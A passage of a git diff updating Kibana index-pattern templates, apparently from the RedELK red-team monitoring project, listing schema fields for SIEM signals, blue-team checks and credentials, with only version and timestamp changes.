"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.3", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363343565, 1305], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson index d4589aba..eb58beb0 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson @@ -1 +1 @@ -{"attributes": {"fieldFormatMap": "{\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktimestamp\"}}},{\"name\":\"bluechecktype\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktype\"}}},{\"name\":\"classifier\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"classifier.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"classifier\"}}},{\"name\":\"domain\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"domain.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"domain\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.id\"}}},{\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.log_file.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.log_file\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"path\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"path\"}}},{\"name\":\"pstools.psx.edr_name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.edr_name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.edr_name\"}}},{\"name\":\"pstools.psx.security_products\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.security_products.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.security_products\"}}},{\"name\":\"pstools.tool\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.tool.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.tool\"}}},{\"name\":\"results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"results\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}},{\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"type\"}}}]", "timeFieldName": "@timestamp", "title": "bluecheck-*"}, "coreMigrationVersion": "7.16.2", "id": "bluecheck", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152837408, 1663], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldFormatMap": "{\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktimestamp\"}}},{\"name\":\"bluechecktype\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktype\"}}},{\"name\":\"classifier\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"classifier.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"classifier\"}}},{\"name\":\"domain\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"domain.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"domain\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.id\"}}},{\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.log_file.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.log_file\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"path\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"path\"}}},{\"name\":\"pstools.psx.edr_name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.edr_name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.edr_name\"}}},{\"name\":\"pstools.psx.security_products\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.psx.security_products.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.psx.security_products\"}}},{\"name\":\"pstools.tool\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"pstools.tool.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"pstools.tool\"}}},{\"name\":\"results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"results\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}},{\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"type\"}}}]", "timeFieldName": "@timestamp", "title": "bluecheck-*"}, "coreMigrationVersion": "7.16.3", "id": "bluecheck", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363325826, 1146], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson index 35dc0ff9..69f6db4f 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_credentials.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"es